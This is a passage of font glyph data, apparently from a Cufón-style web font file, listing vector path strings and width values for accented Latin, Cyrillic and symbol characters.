234},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm-29,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":86},{"d":"220,-96v0,82,-97,136,-152,74r0,92r-49,0r0,-165v-1,-54,44,-101,99,-101v54,0,102,45,102,100xm119,-151v-29,0,-52,24,-52,55v0,32,21,56,52,56v30,0,52,-25,52,-56v0,-32,-21,-56,-52,-55","w":234},{"d":"8,-259r52,0r41,92r41,-92r51,0r-54,122r46,0r0,29r-59,0r0,22r59,0r0,30r-59,0r0,56r-50,0r0,-56r-60,0r0,-30r60,0r0,-22r-60,0r0,-29r47,0","w":201},{"d":"29,0r0,-259r50,0r0,215r87,0r0,-215r50,0r0,259r-71,0r0,39r-46,0r0,-39r-70,0","w":244},{"d":"80,109r0,-234r180,0r0,31r-83,0r0,203r-31,0r0,-200r-36,0r0,200r-30,0","w":256},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm108,-347r57,0r-65,69r-34,0","w":187},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm124,-347r57,0r-65,69r-34,0","w":230},{"d":"5,0r68,-129r-67,-130r158,0r0,49r-80,0r42,81r-43,81r83,0r0,48r-161,0","w":180},{"d":"268,-61v1,63,-57,63,-122,61r-48,-121r-48,121r-49,0r82,-191r31,0r28,69v66,-3,125,-1,126,61xm178,-37v24,1,38,-3,40,-22v2,-28,-32,-24,-59,-24","w":280},{"d":"25,-226r0,-39r101,0r0,39r-101,0","w":151},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137xm125,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":280},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"37,-191r44,0r-32,96r32,95r-44,0r-33,-95xm116,-191r45,0r-32,96r32,95r-45,0r-32,-95","w":165},{"d":"98,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":119},{"d":"97,-250r73,125r-73,125r-20,0r-69,-125r69,-125r20,0xm87,-233r-60,108r60,108r63,-108","w":177},{"w":100},{"d":"113,-94r0,-234r31,0r0,203r116,0r0,31r-147,0","w":256},{"d":"86,-175r39,-46r0,45r-39,46r0,83r72,0r0,47r-121,0r0,-72r-30,34r0,-45r30,-34r0,-142r49,0r0,84","w":172},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"w":100},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm120,-347r57,0r-65,69r-34,0","w":223},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm83,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":237},{"d":"114,-152v-60,0,-38,90,-42,152r-48,0r0,-265r48,0r0,93v38,-42,122,-26,122,46r0,126r-47,0v-6,-56,20,-152,-33,-152xm37,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0"},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49xm18,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":180},{"d":"41,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm32,-265r-7,67r-35,0r-7,-67r49,0","w":253},{"d":"54,-259r49,0r59,181r61,-181r48,0r43,259r-47,0r-28,-163r-55,163r-44,0r-54,-163r-28,163r-48,0","w":323},{"d":"100,-265r44,0v2,45,-4,73,-25,99r-17,-14v9,-12,12,-18,15,-35r-17,0r0,-50xm28,-265r44,0v2,45,-3,74,-25,99r-17,-14v9,-12,12,-18,16,-35r-18,0r0,-50","w":172},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55xm42,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":237},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49xm60,-303v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":180},{"d":"108,5v-49,0,-94,-39,-93,-86v0,-36,18,-62,55,-77v-55,-38,-15,-112,54,-112v15,0,34,3,55,8r-13,43v-36,-16,-99,-1,-64,33v7,4,18,10,34,16v43,17,65,46,65,86v1,50,-43,89,-93,89xm153,-84v0,-25,-21,-46,-45,-46v-24,0,-45,21,-45,46v0,25,21,46,45,46v24,0,45,-21,45,-46","w":215},{"d":"119,-195v84,-8,153,23,153,99v0,57,-36,90,-106,100r0,66r-47,0r0,-66v-93,-3,-131,-88,-85,-156v12,-18,30,-32,53,-43r13,47v-57,26,-46,106,19,107r0,-154xm166,-151r0,110v38,-5,58,-23,58,-54v0,-34,-20,-54,-58,-56","w":286},{"d":"19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"161,-42v65,-2,41,-86,46,-149r48,0r0,95v0,59,-31,93,-94,100r0,66r-48,0r0,-66v-63,-7,-94,-41,-94,-102r0,-93r48,0v4,60,-19,148,46,148r0,-148r48,0r0,149","w":274},{"d":"206,0r-49,0r-55,-120r-50,120r-49,0r73,-177r-41,-88r49,0","w":208},{"d":"143,-115r-7,-7r-72,122r-59,0r96,-150r-87,-109r59,0r70,93r0,-93r50,0r0,93r70,-93r60,0r-87,109r95,150r-58,0r-73,-122r-7,7r0,115r-50,0r0,-115","w":336},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm117,-295r57,0r-65,69r-34,0"},{"d":"114,-259r49,0r83,213r29,0r0,85r-47,0r0,-39r-178,0r0,39r-48,0r0,-85r29,0xm139,-190r-57,144r113,0","w":277},{"d":"152,-265v73,0,133,63,133,137v0,74,-60,135,-133,135v-74,0,-135,-62,-135,-136v0,-74,63,-136,135,-136xm151,-217v-49,0,-85,40,-85,89v0,49,39,87,86,87v47,0,84,-41,84,-88v0,-47,-38,-88,-85,-88xm105,-154r93,0r0,47r-93,0r0,-47","w":302},{"d":"51,-249r255,127r-255,127r0,-254","w":356},{"d":"137,-81v0,-39,-48,-55,-68,-25r-40,-9r31,-144r121,0r0,46r-84,0r-11,47v54,-14,99,30,99,83v0,72,-89,118,-145,71v-16,-13,-27,-30,-32,-52r52,0v13,39,77,28,77,-17","w":201},{"d":"218,-259r0,259r-49,0r0,-162r-97,162r-43,0r0,-259r50,0r0,168r97,-168r42,0","w":247},{"d":"36,-262r47,0r0,133r-33,0r0,-105r-34,0xm75,7r110,-272r30,0r-110,272r-30,0xm240,-108v-12,0,-20,9,-20,21r-33,0v-4,-60,105,-65,105,-9v0,32,-28,49,-49,69r50,0r0,27r-110,0r0,-15v24,-25,65,-44,76,-79v-1,-9,-8,-14,-19,-14","w":302},{"d":"24,-191r112,0r0,45r-64,0r0,146r-48,0r0,-191xm87,-296r57,0r-65,69r-34,0","w":143},{"d":"187,-184v-1,38,-20,58,-50,69r62,115r-54,0r-58,-110r-5,0r0,110r-49,0r0,-259v83,-3,155,-1,154,75xm139,-184v-1,-27,-25,-27,-57,-26r0,52v30,0,58,2,57,-26xm142,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":208},{"d":"-41,7r110,-272r30,0r-110,272r-30,0","w":57},{"d":"179,-48v-28,-2,-44,-17,-58,-42v2,55,22,76,71,84r2,6r-149,0r1,-6v50,-7,70,-31,71,-84v-10,24,-30,41,-58,42v-25,1,-48,-22,-48,-49v0,-37,36,-64,71,-40v-27,-33,-4,-79,36,-79v41,-1,66,48,37,79v36,-23,71,2,72,39v1,27,-21,51,-48,50","w":238},{"d":"113,109r0,-203r-116,0r0,-31r116,0r0,-203r31,0r0,437r-31,0","w":256},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm94,-318v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm147,-318v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15","w":266},{"d":"5,25v0,-65,101,-89,163,-54r-5,-241r10,0v25,14,96,77,100,105v0,4,-6,12,-10,12v-23,-15,-61,-60,-88,-74r4,242v0,80,-174,94,-174,10","w":277},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm48,-49r33,18r-43,74r-24,-12","w":100},{"d":"109,5v-64,-2,-91,-33,-90,-102r0,-94r48,0v5,58,-21,151,42,151v30,0,45,-17,45,-52v0,-28,-16,-50,-48,-65r26,-40v46,25,69,60,69,105v0,56,-34,98,-92,97xm133,-288r-7,67r-35,0r-7,-67r49,0"},{"d":"29,0r0,-259r50,0r0,215r87,0r0,-215r50,0r0,215r52,0r0,83r-46,0r0,-39r-193,0","w":270},{"d":"69,-178v21,0,39,14,50,30v16,-23,27,-39,57,-40v34,-1,54,26,54,61v0,35,-20,61,-54,61v-31,-1,-42,-17,-57,-40v-11,17,-28,31,-50,31v-26,0,-43,-23,-43,-52v0,-29,17,-51,43,-51xm204,-128v0,-28,-24,-44,-45,-28v-6,5,-14,15,-23,29v17,24,16,33,41,35v18,1,27,-18,27,-36xm51,-128v0,20,18,34,33,21v6,-4,12,-11,20,-21v-12,-17,-22,-24,-33,-24v-13,0,-20,10,-20,24","w":256},{"d":"195,5v-48,0,-89,-37,-97,-77r-26,0r0,72r-48,0r0,-191r48,0r0,76r26,0v9,-45,48,-80,97,-81v54,-1,101,45,101,100v0,55,-45,101,-101,101xm196,-40v31,0,52,-24,52,-56v0,-31,-22,-55,-52,-55v-30,0,-52,24,-52,55v0,33,21,56,52,56","w":311},{"d":"160,-72v-26,24,-78,23,-104,0r-18,19r-21,-22r18,-18v-22,-25,-21,-78,0,-102r-18,-18r21,-22r19,18v27,-21,77,-22,103,0r18,-18r21,22r-18,17v22,25,22,78,0,103r19,18r-21,22xm109,-200v-30,0,-56,27,-56,57v0,28,26,55,55,55v30,0,55,-25,55,-56v0,-30,-25,-56,-54,-56"},{"d":"54,-259r49,0r59,181r61,-181r48,0r43,259r-47,0r-28,-163r-55,163r-44,0r-54,-163r-28,163r-48,0","w":323},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"100,-219v-23,0,-37,20,-37,44r-48,0v1,-53,36,-90,89,-90v66,-1,99,67,68,126v-14,26,-51,67,-77,93r92,0r0,46r-179,0r0,-24v41,-51,116,-90,128,-161v3,-19,-17,-35,-36,-34","w":201},{"d":"36,-262r47,0r0,133r-33,0r0,-105r-34,0xm82,7r110,-272r30,0r-110,272r-30,0xm250,-136r32,0r0,85r14,0r0,25r-14,0r0,26r-29,0r0,-26r-70,0r0,-26xm253,-51r0,-47r-39,47r39,0","w":302},{"d":"54,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":172},{"d":"-3,109r0,-437r263,0r0,437r-263,0","w":256},{"d":"19,-265r48,0r0,265r-48,0r0,-265xm79,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":86},{"d":"11,-100r125,-65r-125,-65r0,-44r176,90r0,39r-176,89r0,-44xm187,-36r0,44r-176,0r0,-44r176,0","w":197},{"d":"55,-259r49,0r0,259r-49,0r0,-259xm32,-265r-7,67r-35,0r-7,-67r49,0","w":129},{"d":"114,-152v-61,0,-37,92,-42,152r-48,0r0,-191r48,0r0,19v45,-44,122,-25,122,46r0,196r-48,0r0,-154v1,-39,1,-68,-32,-68xm133,-288r-7,67r-35,0r-7,-67r49,0"},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0xm135,-295r42,69r-34,0r-65,-69r57,0","w":287},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259xm54,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":266},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49","w":180},{"d":"29,-259r129,0r0,49r-80,0r0,210r-49,0r0,-259xm121,-347r57,0r-65,69r-34,0","w":166},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm65,-226r0,-39r101,0r0,39r-101,0","w":230},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm43,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":230},{"d":"43,-30v-57,-62,-6,-166,75,-166v21,0,40,6,58,18r22,-25r22,20r-23,25v52,64,5,163,-79,163v-20,0,-37,-6,-53,-16r-23,26r-22,-19xm146,-144v-48,-27,-102,28,-72,79xm96,-45v47,22,92,-29,69,-77","w":237},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80","w":187},{"d":"20,-170v0,-15,15,-30,30,-30v16,0,31,14,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30xm75,70r-49,0r0,-189r49,0r0,189","w":100},{"d":"24,0r0,-191r48,0r0,145r72,0r0,-145r48,0r0,145r48,0r0,80r-45,0r0,-34r-171,0","w":242},{"d":"180,-66v3,-50,-31,-47,-80,-47r0,113r-50,0r0,-210r-46,0r0,-49r142,0r0,49r-46,0r0,49v84,-4,130,15,130,94r0,67r-50,0r0,-66","w":246},{"d":"193,-191r-67,123r75,138r-53,0r-48,-93r-47,93r-53,0r75,-137r-68,-124r53,0r41,79r40,-79r52,0","w":201},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm18,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":100},{"d":"232,-146r-31,0r0,146r-48,0r0,-146r-65,0r0,146r-48,0r0,-146r-29,0r0,-45r221,0r0,45","w":242},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm101,-278r0,-39r101,0r0,39r-101,0","w":302},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm103,-347r42,69r-34,0r-65,-69r57,0","w":223},{"d":"160,-22v35,61,-27,120,-100,91r10,-42v21,12,70,4,49,-21v-4,-2,-16,-7,-33,-10v-87,-14,-96,-114,-29,-149v-21,-13,-30,-31,-30,-54v-2,-65,79,-73,138,-55r-13,43v-27,-7,-79,-14,-78,19v2,30,42,31,77,30r0,44v-44,-1,-90,-2,-90,40v0,47,84,37,99,64","w":171},{"d":"191,-75v0,49,-33,76,-89,75r-72,0r0,-259v75,-2,142,1,142,67v0,24,-10,38,-26,50v28,12,45,32,45,67xm125,-185v1,-23,-20,-29,-46,-27r0,55v26,1,46,-5,46,-28xm143,-77v0,-30,-27,-38,-64,-36r0,66v35,0,64,-1,64,-30","w":208},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm119,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":302},{"d":"69,-105v16,72,117,86,164,27r33,35v-33,33,-58,48,-112,50v-80,2,-137,-59,-137,-137v0,-99,104,-164,199,-122v20,9,37,22,51,39r-34,33v-45,-63,-156,-38,-164,30r99,0r0,45r-99,0","w":280},{"d":"113,-190v46,3,96,3,146,3r0,36r-58,0v50,62,0,156,-83,156v-61,0,-103,-42,-103,-100v0,-54,46,-98,98,-95xm170,-97v0,-37,-18,-63,-53,-63v-35,1,-50,27,-50,67v0,39,15,66,52,65v35,-1,52,-28,51,-69","w":265},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm18,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":100},{"d":"185,-73v0,-43,-39,-41,-85,-40r0,113r-50,0r0,-210r-46,0r0,-49r142,0r0,49r-46,0r0,49v82,-3,135,10,135,86v0,65,-45,98,-109,73r15,-41v26,10,45,1,44,-30","w":248},{"d":"27,-134v-6,99,127,148,189,81r33,0v-28,36,-53,58,-109,58v-81,0,-139,-58,-139,-138v0,-80,57,-136,139,-138v65,-2,125,52,125,113v0,59,-40,98,-90,104v-13,2,-22,-5,-22,-18v-34,39,-101,5,-96,-48v-8,-62,80,-116,118,-61r4,-19r35,0r-20,115v0,3,3,6,7,6v24,-6,40,-37,40,-69v-2,-60,-42,-97,-102,-97v-67,0,-108,45,-112,111xm101,-124v0,18,11,32,29,32v38,0,50,-72,7,-73v-20,-1,-37,20,-36,41","w":266},{"d":"49,-212v30,4,35,-26,13,-26v-8,0,-14,5,-18,13r-32,0v1,-51,92,-52,96,-5v0,11,-5,20,-16,26v47,20,17,78,-32,78v-29,0,-53,-18,-53,-46r32,0v0,26,43,24,44,3v0,-12,-11,-18,-34,-18r0,-25xm81,7r110,-272r30,0r-110,272r-30,0xm241,-136v39,-3,63,40,33,64v41,23,17,81,-33,75v-52,6,-75,-51,-35,-75v-30,-25,-4,-69,35,-64xm240,-83v9,0,16,-6,16,-14v0,-8,-5,-12,-16,-12v-8,1,-15,4,-15,12v-1,8,7,14,15,14xm218,-40v0,10,10,16,22,16v15,0,23,-6,23,-16v-1,-22,-44,-22,-45,0","w":302},{"d":"102,-59r-92,-200r56,0r60,145r50,-145r51,0r-69,185v-20,80,-100,108,-154,42r33,-32v20,26,48,30,65,5","w":230},{"d":"110,-127r-113,0r0,-31r82,0r0,-170r31,0r0,201xm260,-127r-114,0r0,-201r31,0r0,170r83,0r0,31xm260,-60r-263,0r0,-31r263,0r0,31","w":256},{"d":"29,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259","w":244},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm100,-347r57,0r-65,69r-34,0xm178,-347r57,0r-64,69r-35,0","w":230},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0xm171,-347r57,0r-65,69r-34,0","w":323},{"d":"146,109r0,-437r31,0r0,203r83,0r0,31r-83,0r0,203r-31,0xm80,109r0,-437r30,0r0,437r-30,0","w":256},{"d":"154,-265v75,0,132,46,131,118v0,40,-19,72,-60,98r65,0r0,49r-119,0r0,-59v43,-22,65,-51,65,-88v1,-44,-35,-70,-82,-70v-47,0,-82,26,-82,70v0,37,22,66,65,88r0,59r-119,0r0,-49r65,0v-41,-26,-61,-58,-61,-98v0,-72,57,-118,132,-118","w":307},{"d":"148,-44r0,-215r50,0r0,215r70,0r0,-215r50,0r0,259r-289,0r0,-259r50,0r0,215r69,0","w":347},{"d":"-7,-329r216,0r0,13r-216,0r0,-13","w":201},{"d":"25,-191r48,0r0,79r70,-79r60,0r-82,92r92,99r-59,0r-81,-88r0,88r-48,0r0,-191","w":208},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm48,-49r33,18r-43,74r-24,-12","w":100},{"d":"50,0r-26,0r0,-191r47,0r0,112r98,-112r23,0r0,191r-47,0r0,-110xm77,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0"},{"d":"300,-46r49,0r0,80r-46,0r0,-34r-279,0r0,-191r48,0r0,145r66,0r0,-145r48,0r0,145r66,0r0,-145r48,0r0,145","w":351},{"d":"212,-105v-16,72,-117,86,-164,27r-33,35v33,33,58,48,112,50v80,2,137,-59,137,-137v0,-99,-104,-164,-199,-122v-20,9,-37,22,-51,39r34,33v45,-63,156,-38,164,30r-99,0r0,45r99,0","w":280},{"d":"112,-176r-28,0r3,-89r47,0xm40,-176r-28,0r3,-89r47,0","w":129},{"d":"291,-61v3,72,-76,61,-147,61r0,-79r-72,0r0,79r-48,0r0,-191r48,0r0,69r72,0r0,-69r48,0r0,69v62,-3,97,8,99,61xm192,-37v26,1,47,0,48,-22v2,-24,-23,-25,-48,-24r0,46","w":303},{"d":"4,-259r143,0r0,49r-46,0r0,210r-50,0r0,-210r-47,0r0,-49xm60,21r31,0v0,30,0,42,-17,54r-9,-9v6,-4,8,-10,10,-16r-15,0r0,-29","w":151},{"d":"101,-150v-37,-16,-40,29,-40,73r0,77r-48,0r0,-191r41,0r0,24v9,-22,35,-37,62,-24xm-15,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":115},{"d":"31,-102v0,-42,36,-77,78,-77v41,0,77,36,77,77v0,41,-36,78,-77,78v-41,0,-78,-37,-78,-78","w":217},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm124,-297v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":100},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100xm41,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":230},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm143,-288r-7,67r-35,0r-7,-67r49,0","w":237},{"d":"47,-49r35,18r-44,74r-24,-12","w":100},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm79,-318v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm132,-318v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15","w":230},{"d":"-2,-82r0,-43r184,0r0,43r-184,0","w":180},{"d":"16,-191r147,0r-86,150r81,0r0,41r-155,0r86,-151r-73,0r0,-40xm84,-295r57,0r-65,69r-34,0","w":165},{"d":"70,-265r32,0r0,85r14,0r0,25r-14,0r0,26r-29,0r0,-26r-70,0r0,-26xm73,-180r0,-47r-39,47r39,0","w":120},{"d":"26,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm104,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":180},{"d":"43,-30v-57,-62,-6,-166,75,-166v21,0,40,6,58,18r22,-25r22,20r-23,25v52,64,5,163,-79,163v-20,0,-37,-6,-53,-16r-23,26r-22,-19xm146,-144v-48,-27,-102,28,-72,79xm96,-45v47,22,92,-29,69,-77xm128,-295r57,0r-65,69r-34,0","w":237},{"d":"50,0r-26,0r0,-191r47,0r0,112r98,-112r23,0r0,191r-47,0r0,-110"},{"d":"104,-160r0,82r-81,0r0,-82r81,0","w":127},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm0,-278r0,-39r101,0r0,39r-101,0","w":100},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm113,-295r57,0r-65,69r-34,0","w":208},{"d":"13,-259r55,0r54,83r55,-83r55,0r-82,126r87,133r-55,0r-60,-91r-59,91r-56,0r88,-133","w":244},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm87,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":230},{"d":"346,-95r0,8v-21,9,-45,29,-71,59r-14,0v8,-20,19,-38,34,-54r-230,0v15,16,26,34,34,54r-14,0v-26,-30,-50,-50,-71,-59r0,-8v21,-9,45,-29,71,-59r14,0v-8,20,-19,38,-34,54r230,0v-15,-16,-26,-34,-34,-54r14,0v26,30,50,50,71,59","w":360},{"d":"4,-259r143,0r0,49r-47,0r0,210r-50,0r0,-210r-46,0r0,-49","w":151},{"d":"64,-225r17,0r0,207r208,0r0,18r-225,0r0,-225","w":352},{"d":"113,-60r0,-268r31,0r0,170r116,0r0,31r-116,0r0,36r116,0r0,31r-147,0","w":256},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0xm98,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm176,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":323},{"d":"29,-259r129,0r0,49r-80,0r0,210r-49,0r0,-259","w":166},{"d":"15,-85v0,-52,39,-87,95,-83v-63,-39,-50,-109,33,-105v11,0,26,2,46,6r0,33v-25,-6,-68,-9,-69,12v25,51,102,64,102,137v0,55,-43,90,-101,90v-63,0,-105,-34,-106,-90xm170,-88v0,-32,-19,-55,-51,-55v-34,0,-52,19,-52,59v-1,34,18,56,51,56v35,0,52,-25,52,-60","w":236},{"d":"114,-152v-61,0,-37,92,-42,152r-48,0r0,-191r48,0r0,19v45,-44,122,-25,122,46r0,196r-48,0r0,-154v1,-39,1,-68,-32,-68"},{"d":"29,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259","w":244},{"d":"13,-259r55,0r54,83r55,-83r55,0r-82,126r87,133r-55,0r-60,-91r-59,91r-56,0r88,-133","w":244},{"d":"-2,-82r0,-43r274,0r0,43r-274,0","w":270},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm76,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0"},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-215r-24,0r0,-28r24,0r0,-22r48,0r0,22r56,0r0,28r-56,0r0,43v43,-45,122,-24,122,46r0,126r-48,0v-7,-54,22,-152,-32,-152"},{"d":"29,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259xm132,-347r57,0r-65,69r-34,0","w":223},{"d":"108,-179v41,0,77,35,77,77v0,42,-36,78,-77,78v-41,0,-77,-36,-77,-78v0,-42,36,-77,77,-77xm108,-37v34,0,64,-31,64,-65v0,-34,-30,-64,-64,-64v-34,0,-64,31,-64,64v0,33,30,65,64,65"},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm140,-347r57,0r-65,69r-34,0xm218,-347r57,0r-64,69r-35,0","w":302},{"d":"19,-191r48,0r0,191r-48,0r0